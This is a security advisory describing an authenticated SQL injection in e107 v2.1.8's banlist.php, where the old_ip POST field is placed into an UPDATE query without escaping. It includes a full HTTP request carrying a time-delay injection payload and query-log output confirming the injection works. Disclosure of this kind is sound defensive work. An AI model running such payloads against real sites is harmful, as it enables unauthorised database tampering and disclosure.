e107 v2.1.8 Banlist SQL Injection


e107 v2.1.8 contains a flaw that allows an SQL injection attack. The /e107_admin/banlist.php script concatenates the old_ip POST parameter into an SQL query without escaping it. An attacker who holds an admin session (the form is only reachable after logging in to the admin area) can inject or manipulate SQL queries against the database, allowing the manipulation or disclosure of arbitrary data.


  1. Log in to the admin page (/e107_admin/admin.php).
  2. Submit the banlist form and use Burp Suite to rewrite the POST request to /e107_admin/banlist.php as follows (the values of entry_intent and update_ban are not shown in the capture):

```http
POST /e107/e107_admin/banlist.php HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryREEvpmFYBJa0wazD
Cookie: my_cookie=***********************
Content-Length: 464

------WebKitFormBoundaryREEvpmFYBJa0wazD
Content-Disposition: form-data; name="entry_intent"

------WebKitFormBoundaryREEvpmFYBJa0wazD
Content-Disposition: form-data; name="update_ban"

------WebKitFormBoundaryREEvpmFYBJa0wazD
Content-Disposition: form-data; name="ban_ip"

dummy
------WebKitFormBoundaryREEvpmFYBJa0wazD
Content-Disposition: form-data; name="old_ip"

'; SELECT SLEEP(10) --'
------WebKitFormBoundaryREEvpmFYBJa0wazD--
```

  3. The response takes 10 seconds or more to come back.

This means that the SQL statement SELECT SLEEP(10) supplied in old_ip was executed on the server. MySQL's general query log confirms it: the UPDATE is terminated by the injected quote and semicolon, and the rest of the parameter is run as a second statement.

```text
2018-07-31T01:44:07.412204Z	   27 Query	UPDATE e107_banlist SET `banlist_ip`='dummy', `banlist_admin`='1', `banlist_reason`='', `banlist_notes`='' WHERE banlist_ip='';
2018-07-31T01:44:07.412445Z	   27 Query	SELECT SLEEP(10) --''
```

Source Code

The cause of the vulnerability is the UPDATE statement in banlist.php: $_POST['old_ip'] is concatenated into the WHERE clause without escaping, so a single quote in the parameter closes the string literal and everything after it is parsed as SQL.


